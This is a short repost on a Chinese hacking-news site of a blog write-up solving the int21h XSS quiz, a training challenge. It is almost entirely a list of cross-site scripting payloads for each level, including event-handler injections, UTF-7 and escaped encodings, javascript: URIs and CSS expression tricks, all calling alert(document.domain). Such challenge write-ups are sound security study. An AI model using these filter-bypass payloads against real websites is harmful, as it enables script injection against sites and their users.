记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Xss-quiz.int21h.jp

2015-09-18 14:15

Xss-quiz.int21h.jp

18 Sep 2015 - evi1m0

知乎上有人邀请回答 int21h 的跨站题,晚上抽空重新做了一遍:

1, 2: test"/onmouseover=alert(document.domain)//
3: edit counttry: <script>alert(document.domain)</script>
4: hidden input: <input type="hidden" name="p3" value="hackme”> / test"><svg onload=alert(document.domain)>
5: Modified label length (maxlength): a"/onclick=alert(document.domain);//
6: mog"onclick=alert(document.domain)//
7: mog onmouseover=alert(document.domain);
8: javascript:alert(document.domain);
9: +ACIAIABvAG4AYwBsAGkAYwBrAD0AYQBsAGUAcgB0ACgAZABvAGMAdQBtAGUAbgB0AC4AZABvAG0AYQBpAG4AKQAvAC8-
10: test"/onclick=alert(document.dodomainmain)//
11: mog"><a/href=javascr&#09;ipt:alert(document.domain)>test</a>
12: `` onmousemove=alert(document.domain)//ie
13:background:url(javascript:alert(document.domain))
14:mog:ex\0pression(onmouseover=function(){alert(document.domain)})
15:\\x3csvg onload=alert(document.domain);\\x3e
16:\\u003csvG/onload=alert(document.domain);\\u003e
17,18: ...

13 年做这套题时是比较有意思的,当然现在回过头来看下感觉也不差。

知识来源: linux.im/2015/09/18/xss-quiz-int21h.html

阅读:182656 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“Xss-quiz.int21h.jp”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云